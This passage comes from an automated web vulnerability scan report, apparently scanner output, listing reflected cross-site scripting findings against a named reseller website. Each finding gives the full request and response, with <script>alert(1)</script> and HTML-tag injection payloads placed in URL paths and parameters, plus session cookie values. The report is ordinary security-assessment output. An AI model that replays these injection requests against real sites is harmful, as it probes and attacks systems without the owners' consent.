<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=2&628bb<script>alert(1)</script>f63702e0b9e=1 was not found on this server.</p>
...[SNIP]...

2.575. http://www.resellerbase.com/communication/broadband/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 13c34<a>236373472b4 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=213c34<a>236373472b4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/search.php?keyword=search...&Submit3=Search&opt=213c34<a>236373472b4 was not found on this server.</p>
...[SNIP]...

2.576. http://www.resellerbase.com/communication/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7a530<script>alert(1)</script>2109d23084c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication7a530<script>alert(1)</script>2109d23084c/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7a530<script>alert(1)</script>2109d23084c/googlepr.php was not found on this server.</p>
...[SNIP]...

2.577. http://www.resellerbase.com/communication/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8a15<script>alert(1)</script>23fa1f55420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/googlepr.phpc8a15<script>alert(1)</script>23fa1f55420 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/googlepr.phpc8a15<script>alert(1)</script>23fa1f55420 was not found on this server.</p>
...[SNIP]...

2.578. http://www.resellerbase.com/communication/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 587cf<a>0857d2c9eb0 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/googlepr.php?link_id=10587cf<a>0857d2c9eb0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/googlepr.php?link_id=10587cf<a>0857d2c9eb0 was not found on this server.</p>
...[SNIP]...

2.579. http://www.resellerbase.com/communication/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15133<script>alert(1)</script>4a39a8e4e5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/googlepr.php?15133<script>alert(1)</script>4a39a8e4e5f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/googlepr.php?15133<script>alert(1)</script>4a39a8e4e5f=1 was not found on this server.</p>
...[SNIP]...

2.580. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f186b<script>alert(1)</script>2ed3bc269fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationf186b<script>alert(1)</script>2ed3bc269fd/mobile-content/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationf186b<script>alert(1)</script>2ed3bc269fd/mobile-content/ was not found on this server.</p>
...[SNIP]...

2.581. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 649d1<script>alert(1)</script>9bd5009eb19f636a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication649d1<script>alert(1)</script>9bd5009eb19f636a9/mobile-content/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication649d1<script>alert(1)</script>9bd5009eb19f636a9/mobile-content/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.582. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e82c5<script>alert(1)</script>b2fbdfe74625eb331 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/mobile-contente82c5<script>alert(1)</script>b2fbdfe74625eb331/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contente82c5<script>alert(1)</script>b2fbdfe74625eb331/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.583. http://www.resellerbase.com/communication/mobile-content/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3b5a<script>alert(1)</script>ac7b482ac07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentd3b5a<script>alert(1)</script>ac7b482ac07/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentd3b5a<script>alert(1)</script>ac7b482ac07/ was not found on this server.</p>
...[SNIP]...

2.584. http://www.resellerbase.com/communication/mobile-content/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e2940<script>alert(1)</script>e390d38b526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/?e2940<script>alert(1)</script>e390d38b526=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/?e2940<script>alert(1)</script>e390d38b526=1 was not found on this server.</p>
...[SNIP]...

2.585. http://www.resellerbase.com/communication/mobile-content/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload be9c5<a>62550c607ee was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fbe9c5<a>62550c607ee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fbe9c5<a>62550c607ee was not found on this server.</p>
...[SNIP]...

2.586. http://www.resellerbase.com/communication/mobile-content/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6dd7<script>alert(1)</script>3e3bacf83cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationf6dd7<script>alert(1)</script>3e3bacf83cc/mobile-content/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationf6dd7<script>alert(1)</script>3e3bacf83cc/mobile-content/googlepr.php was not found on this server.</p>
...[SNIP]...

2.587. http://www.resellerbase.com/communication/mobile-content/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1d31<script>alert(1)</script>92fae86db29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentc1d31<script>alert(1)</script>92fae86db29/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentc1d31<script>alert(1)</script>92fae86db29/googlepr.php was not found on this server.</p>
...[SNIP]...

2.588. http://www.resellerbase.com/communication/mobile-content/googlepr.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ac3a<script>alert(1)</script>7414cf9482a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/googlepr.php4ac3a<script>alert(1)</script>7414cf9482a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/googlepr.php4ac3a<script>alert(1)</script>7414cf9482a was not found on this server.</p>
...[SNIP]...

2.589. http://www.resellerbase.com/communication/mobile-content/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 48178<a>8f1636048da was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/mobile-content/googlepr.php?link_id=2948178<a>8f1636048da HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/googlepr.php?link_id=2948178<a>8f1636048da was not found on this server.</p>
...[SNIP]...

2.590. http://www.resellerbase.com/communication/mobile-content/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8f1b2<script>alert(1)</script>64ca82a084c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/googlepr.php?8f1b2<script>alert(1)</script>64ca82a084c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/googlepr.php?8f1b2<script>alert(1)</script>64ca82a084c=1 was not found on this server.</p>
...[SNIP]...

2.591. http://www.resellerbase.com/communication/mobile-content/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22d9b<script>alert(1)</script>090344d2f91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication22d9b<script>alert(1)</script>090344d2f91/mobile-content/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication22d9b<script>alert(1)</script>090344d2f91/mobile-content/search.php was not found on this server.</p>
...[SNIP]...

2.592. http://www.resellerbase.com/communication/mobile-content/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b2ec5<script>alert(1)</script>a5e7adbcd18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-contentb2ec5<script>alert(1)</script>a5e7adbcd18/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-contentb2ec5<script>alert(1)</script>a5e7adbcd18/search.php was not found on this server.</p>
...[SNIP]...

2.593. http://www.resellerbase.com/communication/mobile-content/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e3698<script>alert(1)</script>654ff0c5a43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/mobile-content/search.phpe3698<script>alert(1)</script>654ff0c5a43 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/mobile-content/search.phpe3698<script>alert(1)</script>654ff0c5a43 was not found on this server.</p>
...[SNIP]...

2.594. http://www.resellerbase.com/communication/mobile-content/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f9804<a>3af83332e1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

